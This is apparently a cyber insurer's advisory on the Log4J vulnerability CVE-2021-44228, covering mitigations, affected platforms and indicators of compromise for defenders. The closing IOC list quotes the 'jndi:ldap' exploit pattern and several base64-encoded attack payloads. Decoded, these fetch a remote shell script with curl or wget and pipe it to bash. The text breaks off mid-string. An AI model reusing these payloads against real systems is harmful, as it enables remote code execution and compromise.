Cyber Incident? Get Help

New Vulnerability in Log4J - CVE-2021-44228

image.png

Friday, a new critical vulnerability in a software library in Log4J was discovered. This logging library is used across many different Java-based platforms and powers different parts of the internet.

At Coalition, our mission is to solve cyber risk. We continuously scan the internet to identify infrastructure assets vulnerable to different cyber security risks. Since the Log4j vulnerability was released, we quickly implemented a detection capability for the new vulnerability. We have run the new scanner on all Coalition cyber security insurance Policyholders and Coalition Control users. Additionally, we will contact all entities using vulnerable versions of the Log4j library or software that relies on Log4j.

What is Log4J?

Log4J is an open-source logging framework that developers use to record actions and activities within their applications. It is used by platforms such as: Minecraft, VMWareElasticsearch, Apple, CloudflareAmazon Web Services, and Tesla, along with various Apache platforms such as Struts, Druid, ActiveMQ, Flume, Hadoop and Kafka, among many others.

What does this mean for me?

Don't panic. If you are a Coalition policyholder, log into your Coalition Control account and check for a notification for you to remediate issues. Additionally, we are publishing and regularly updating the next section with platforms that are vulnerable to CVE-2021-44228.

Check whether you are running any of the vulnerable software internally in your network as Coalition Control only has visibility to assets exposed to the internet. After you have your list of assets, it is time to mitigate the issue.

Mitigation techniques, in order of preference that deliver maximum protection

Preferred

Update to Log4J 2.16.0 available at https://logging.apache.org/log4j/2.x/download.html. This completely removes the affected JNDI component. This mitigation provides the maximum protection to Log4J attacks.

Acceptable, but not preferred

Update to Log4J 2.15.0. This release disabled the JNDI component by default. This means that the vector could be re-enabled at a later date. This mitigation option provides less protection, and does allow for  the component to be re-enabled. There is a chance that future software vulnerabilities could enable a vector to re-enable this component.

Temporary only

Taken from the Log4J Bulletin at https://logging.apache.org/log4j/2.x/security.html

Mitigation: In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

This method should only be used if none of the above mitigation methods are available to you. In some cases it is possible to remove the mitigations by restarting the affected software or operating system. Please consider this a temporary measure while working toward an upgrade to 2.16.0 of Log4j.

If you have a WAF in front of your web applications make sure to deploy rules for filtering. Services like Cloudflare and AWS and Google CloudArmor already have available pre-built rules. These won't stop every attack but will still be useful against more basic attacks.

Vulnerable Platforms

This section contains a list of platforms Coalition has identified as potentially vulnerable to CVE-2021-44228. For your major vendors not on this list, you should contact them and ask them the following questions:

  • Do you use any software that relies on Log4J

  • Have you executed any mitigations for CVE-2021-44228

  • Did you do any investigation to confirm you have not been a victim to exploitation of CVE-2021-44228

Known vulnerable platforms:

  • Okta RADIUS Server Agent, Okta On-Prem MFA Agent

  • Apache Struts, Solr, Druid, ActiveMQ, Flume, Hadoop, Kafka,Dubbo,Flink,Spark, Tapestry, Wicket

  • Redhat OpenShift Container Platform 4, OpenShift Container Platform 3.11, OpenStack Platform 13 (Queens), OpenShift Logging.

  • Grails

  • Ghidra

  • Minecraft

  • VMWare Horizon, VCenter, HCX, NSX-T Data Center, Unified Access Gateway, WorkspaceOne Access, Identify Manager, VRealize Operations, VRealize Operations cloud proxy, VRealize log insight, VRealize Automation, VRealize Lifecycle Manager, Telco Cloud Automation, Site Recovery Manager, Caron Black Cloud Workload Appliance, Carbon Black EDR Server, Tanzu GemFire, Tanzu Greenplum, Tanzu Operations Manager, Tanzu Application Service for VMs, Tanzu Kubernetes Grid Integrated Edition, Tanzu Observability by Wavefront Nozzle, Healthwatch for Tanzu Application service, Spring Cloud Services for Vmware Tanzu,Spring Cloud Gateway for Vmware Tanzu, Spring Cloud Gateway for Kubernetes, API Portal for VMWare Tanzu, Single Sign-on for VMWare Tanzu Application Service, App Metrics, Vmware vCenter Cloud Gateway, VMWare Tanzu SQL with MySQL for VMs, Vrealize Orchestrator

Potentially vulnerable — can use log4j or embeds log4j

  • Apache Tomcat

  • Dropwizard

  • Elastic Kibana

  • Hibernate

  • JavaServer Faces

  • Oracle ATG Web Commerce

  • Spring Framework

A more extensive list being updated by the cybersecurity community and twitter user @SwitHak which can be found here.

IOCs

Indicators of compromise (IOCs) are a list of signals we've been detecting that can be used to discover if your organization has already been attacked or compromised by this vulnerability. If you have logs, you can search for these strings to help discover if you've been compromised:

Domains:

bingsearchlib.com dnslog.cn

IPs:

  • 104.244.72.115

  • 104.244.76.13

  • 107.189.1.160

  • 107.189.11.228

  • 109.237.96.124

  • 114.116.50.27

  • 128.31.0.13

  • 171.25.193.20

  • 171.25.193.25

  • 171.25.193.77

  • 171.25.193.78

  • 178.17.170.135

  • 178.17.171.102

  • 178.17.174.14

  • 179.43.187.138

  • 18.27.197.252

  • 185.100.87.202

  • 185.14.97.147

  • 185.220.100.240

  • 185.220.100.241

  • 185.220.100.242

  • 185.220.100.244

  • 185.220.100.245

  • 185.220.100.249

  • 185.220.100.250

  • 185.220.100.252

  • 185.220.101.135

  • 185.220.101.136

  • 185.220.101.137

  • 185.220.101.141

  • 185.220.101.145

  • 185.220.101.153

  • 185.220.101.156

  • 185.220.101.162

  • 185.220.101.164

  • 185.220.101.166

  • 185.220.101.170

  • 185.220.101.172

  • 185.220.101.174

  • 185.220.101.183

  • 185.220.101.189

  • 185.220.101.191

  • 185.220.101.34

  • 185.220.101.38

  • 185.220.101.41

  • 185.220.101.42

  • 185.220.101.43

  • 185.220.101.48

  • 185.220.101.50

  • 185.220.101.57

  • 185.220.101.58

  • 185.220.101.63

  • 185.38.175.132

  • 185.51.76.187

  • 195.19.192.26

  • 195.251.41.139

  • 199.195.250.77

  • 202.21.43.230

  • 204.8.156.142

  • 209.127.17.234

  • 209.141.60.19

  • 212.193.57.225

  • 219.100.36.177

  • 23.129.64.137

  • 23.129.64.143

  • 36.33.36.21

  • 45.137.21.9

  • 45.155.205.233

  • 46.166.139.111

  • 5.2.73.229

  • 51.15.43.205

  • 62.102.148.68

  • 62.76.41.46

  • 64.113.32.29

  • 84.53.225.118

  • 94.16.121.91

Strings:

jndi:ldap

/Basic/Command/Base64/

/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=

/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjM1OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjM1OjQ0Myl8YmFzaA==

/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjUwOjgwODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU